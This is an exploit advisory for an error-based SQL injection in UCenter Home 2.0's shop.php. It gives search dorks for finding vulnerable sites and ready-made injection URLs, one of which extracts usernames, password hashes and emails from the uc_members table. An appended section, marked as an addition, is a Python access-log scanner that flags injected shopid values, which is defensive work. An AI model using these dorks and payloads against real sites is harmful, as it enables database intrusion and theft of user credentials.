__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home

Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=

Vulnerability type : SQL Injection (MySQL Error Based)

Needed materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

To inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : OK.
You edit the DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'
Edit : OK.

Use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
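
Detection note (an added example, not part of the original advisory): a Python check that scans web-server access logs for shop.php requests whose shopid value is not a plain integer, and tags the error-based fragments seen in the queries above. The log lines are constructed, and treating legitimate shopid values as integers is an assumption based on the shopid=253 form shown in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /space.php?uid=4 HTTP/1.1" 200 2048',
    '192.0.2.31 - - [01/Jan/2024:10:00:12 +0000] "GET /shop.php?ac=view&shopid=12%27 HTTP/1.1" 200 640',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Fragments of the duplicate-key error technique and table named in the advisory.
MARKERS = ("floor(rand(", "information_schema", "group by", "concat(", "uc_members")


def inspect(line):
    """Return (client, shopid, markers) for a suspicious shop.php request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/shop.php"):
        return None
    # parse_qs percent-decodes values; keep blanks so an empty "shopid=" is still seen.
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if not re.fullmatch(r"[0-9]+", value):  # assumption: valid ids are plain integers
            lowered = value.lower()
            return client, value, [k for k in MARKERS if k in lowered]
    return None


def scan(lines):
    """Collect every suspicious request found in an iterable of log lines."""
    return [hit for hit in map(inspect, lines) if hit]


if __name__ == "__main__":
    for client, value, markers in scan(SAMPLE_LOG):
        print(f"{client} shopid={value[:60]!r} markers={markers}")
```

A hit with an empty marker list (such as a stray quote) is still worth reviewing, since any non-integer shopid reaching the query points to missing input validation in shop.php.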